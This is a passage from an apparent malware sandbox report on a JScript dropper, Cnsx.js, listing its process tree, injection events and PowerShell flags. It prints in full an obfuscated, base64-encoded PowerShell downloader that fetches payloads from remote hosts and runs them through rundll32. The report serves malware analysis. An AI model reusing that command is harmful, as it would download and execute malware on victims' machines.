OAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness
parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2032 resumed a thread in remote process 1368
Process injection	Process 1368 resumed a thread in remote process 2416
NtResumeThread May 12, 2023, 9:26 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 1368	1	0	0
NtResumeThread May 12, 2023, 9:26 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2416	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Cnsx.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All